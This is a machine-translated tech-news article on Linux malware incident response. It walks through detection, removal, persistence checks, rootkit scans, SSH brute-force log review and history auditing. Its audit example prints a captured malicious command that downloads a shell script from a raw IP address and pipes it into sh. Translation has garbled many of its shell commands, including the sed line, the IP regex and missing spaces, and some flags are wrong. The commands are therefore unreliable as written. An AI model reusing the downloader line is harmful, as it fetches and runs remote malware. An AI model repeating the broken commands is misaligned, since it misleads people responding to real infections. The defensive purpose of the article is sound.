Shulou(Shulou.com)06/01 Report--

What is Linux's emergency response skills, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain for you in detail, people with this need can come to learn, hope you can gain something.

Overview

Dealing with emergency response events in Linux environment is often more difficult, because compared with Windows,Linux, there is no emergency response weapon such as Autorun, procexp, and there is no unified emergency response processing process.

Therefore, this article will explain the emergency response process in Linux environment, and provide shell commands used in each link to help you deal with viruses in Linux environment quickly and systematically.

Dealing with Linux emergency response is mainly divided into these four links: identifying phenomenon-> removing virus-> closed-loop backing-> system reinforcement.

First of all, starting from the abnormal phenomenon of the host in the user scenario, we first identify the suspicious phenomenon of the virus. Then locate the specific virus process and virus files, and remove them.

It is not enough to complete the first two steps, the virus will usually be re-infected through some self-startup items and daemons, so we need to perform a closed loop to ensure that the virus is no longer created.

After cleaning up the virus items on the host, the system is finally hardened to prevent the virus from invading again from the Web.

After these four links, it can be regarded as the end of an emergency response process.

Recognition phenomenon

The first step requires us to find the abnormal phenomena of the host and confirm the suspicious behavior of the virus through the running status of the system and the alarm of the security equipment.

Is the system CPU abnormal?

Enumerate processes, CPU descending sort: top

If the CPU occupancy rate is more than 70% and the name is suspicious, it is likely to be a mining virus.

Whether there is a suspicious process

Enumerate the process command line: ps-aux

Viruses usually carry suspicious command lines. When you find strange strings such as url on the command line, you should be aware that it is probably a virus downloader.

Is there an alarm in the security gateway?

Identifying the threat from the security gateway alarm is the most direct, but confirming that the host has been infected with the virus is only the first step, and the next step is to locate which process is communicating with ClearC.

Monitor the process of communicating with the target IP:

While true; do netstat-antp | grep [ip]; done

Sometimes the security gateway detects not all malicious IP, but also a domain name. In this case, the IP corresponding to the domain name changes, and we cannot directly use the above method to monitor.

We can first add a rule to the host file to redirect the malicious domain name to a random IP address, and then monitor it.

In this way, you can get the malicious process of communicating with it.

Are there any suspicious history orders?

Traverse the host history command to find out if there are any malicious commands: history

Clear the virus

The process information traced back to the first step will help us locate the virus process-virus files and achieve cleanup.

End the virus process

Clear the process chain for suspicious processes:

Ps-elf | grep [pid] kill-9 [pid]

Delete virus files

Locate the file path corresponding to the virus process:

Ls-al / proc/ [pid] / exe rm-f [exe_path]

Closed loop pocket bottom

The persistence mode of virus under Linux is less than that of Windows, mainly in the following four ways.

Check if there are suspicious scheduled tasks

Enumerate timing tasks: crontab-l

View anacron async scheduled tasks: cat/etc/anacrontab

Check if there are suspicious services

Enumerate all the services of the host to see if there are any malicious services:

Service--status-all

Check whether the system files are hijacked

Enumerate the files in the system folder and view the files that have been modified within 7 days in the order of modification events:

Find / usr/bin/ / usr/sbin/ / bin/ / usr/local/bin/-type f-mtime + 7 | xargs ls-la

Check for the existence of virus daemons

Monitoring the behavior of daemons: lsof-p [pid]

Strace-tt-T-etrace=all-p$pid

Scan for malicious drivers

Enumerate / scan system drivers: lsmod

Install chkrootkit to scan:

Wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gztar zxvf chkrootkit.tar.gzcd chkrootkit-0.52make sense./chkrootkit

Install rkhunter to scan:

Wget https://nchc.dl.sourceforge.net/project/rkhunter/rkhunter/1.4.4/rkhunter-1.4.4.tar.gz tar-zxvf rkhunter-1.4.4.tar.gz cd rkhunter-1.4.4. / installer.sh-- install rkhunter- c

The last step is easy for everyone to forget. 90% of the viruses on the Linux platform are infected through the network. Therefore, most of the reasons why your host is infected with the virus are due to the lack of Web security protection, so check it quickly.

Modify SSH weak password

Query the login log of log host:

Grep "Accepted" / var/log/secure* | awk'{print $1, 2, 3, 9, 11}'

Locate the source IP of the blasting:

Grep "Failed password" / var/log/secure | grep-E-o (25 [0-5] | 2 [0-4] [0-9] | [01]? [0-9] [0-9]?). (25 [0-5] | 2 [0-4] [0-9]?). (25 [0-5] | 2 [0-4] [0-9] | [01]? [0-9] [0-9]) ). (25 [0-5] | 2 [0-4] [0-9] | [01]? [0-9] [0-9]?) "| uniq-c

The username and password of the blasting log:

Grep "Failed password" / var/log/secure | perl-e 'while ($_ =) {/ for (. *?) from/; print "$1n";}' | uniq-c | sort-nr

SSH blasting is the most commonly used means of transmission of Linux virus. If a host with a weak password is easily blown up by other infected hosts SSH, the virus will be infected again.

Add command audit

Add information such as login IP address, execution time and so on for historical commands:

[1] Save 10,000 commands:

Sed-I's / ^ HISTSIZE = 1000Universe HISTSIZEHISTSIZE 10000GN / etc/profile

[2] add the following line number configuration information at the end of the / etc/profile file:

USER_IP= `who-u ami 2 > / dev/null | awk'{print $NF}'| sed-e's / [()] / / g``if ["$USER_IP" = ""] then USER_IP= `hostname`fi export HISTTIMEFORMAT= "% F% T $USER_IP `whoami`" shopt-s histappend export PROMPT_COMMAND= "history-a"

[3] make the configuration effective:

Source / etc/profile

Generate the effect:

762019-10-2817 wget-Q-T180-O-http://103.219.112.66:8000/i.sh) | sh is patched with common Web vulnerabilities

Structs2 series RCE vulnerabilities

Thinkphp5.XRCE vulnerability

Redis unauthorized access vulnerability

ConfluenceRCE vulnerability (CVE_2019_3396)

DrupalRCE vulnerability (CVE-2018-7600)

ThinkPHPRCE vulnerability (CVE-2019-9082)

The malware threats under Linux platform are mainly botnet worms and mining viruses. Because Linux is mostly exposed as a server in the public network, and the vulnerabilities of Web applications emerge in endlessly, it is easy to be invaded on a large scale, such as common viruses: DDG, systemdMiner, BillGates, watchdogs, XorDDos, on many Linux. We should form the good habit of not using weak passwords and patching frequently.

Is it helpful for you to read the above content? If you want to know more about the relevant knowledge or read more related articles, please follow the industry information channel, thank you for your support.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.